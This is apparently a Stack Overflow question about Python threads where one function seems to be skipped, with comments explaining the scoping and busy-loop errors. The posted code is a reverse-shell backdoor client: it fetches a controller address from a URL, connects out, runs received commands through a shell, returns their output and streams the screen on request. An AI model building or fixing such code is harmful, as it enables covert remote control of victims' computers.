# python Threading skipping function

Tags: python, python-3.x, multithreading, python-3.8

i was trying to launch 2 function at the same time using threading, but python skipping my first function. have you any idea why ?

```
def ip_spoofer():
    while True:
        print("gg")
        REMOTE_BUFFER = requests.get('MY_URL').json()
        REMOTE_HOST = REMOTE_BUFFER['ip']
        time.sleep(60)

def hello():
    try:
        REMOTE_PORT = 8081
        client = socket.socket()
        while True:
            try:
                print('hey') # Debugging
                if 'ip_spoofer.REMOTE_HOST' in locals():
                    print('bye') # Debugging
                    client.connect((ip_spoofer.REMOTE_HOST, REMOTE_PORT))
                    break
            except:
                pass

        while True:
            command = client.recv(1024)
            command = command.decode()
            if command == 'KEY_SCREEN':
                sender = ScreenShareClient(ip_spoofer.REMOTE_HOST, REMOTE_PORT)
                sender.start_stream()
            else:
                output = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
                out, err = output.communicate()
                client.send(out + err)
    except:
        hello()

threading.Thread(target=ip_spoofer).start()
threading.Thread(target=hello).start()
```

Output : console spamming `hey` because the while. I deduce python skipping the first function.

Comment: Your first function only prints `gg` once every minute; your `hello` function spams `hey` constantly, so you have thousands (millions?) of `hey`s per `gg`.  You're probably just not spotting the `gg` hidden amongst all the spam.

Comment: `ip_spoofer.REMOTE_HOST` does not refer to `REMOTE_HOST` which is local to the function `ip_spoofer`.

Comment: You also might want to consider using `threading.Event` as a way for these threads to communicate rather than a `while True` loop and global variable shenanigans (which  you aren't implementing correctly right now anyway).

Comment: It's always not working i've deleted the `time.sleep(60)` and i always have the same output. First of all i was tring to use the REMOTE_HOST variable in the second fonction but it doesn't detect it. it is why i tried some debugging and inderstanding python skipping first fonction. It's weird ?!

Comment: Try adding a short sleep in each loop so your `while True` isn't consuming the entire CPU.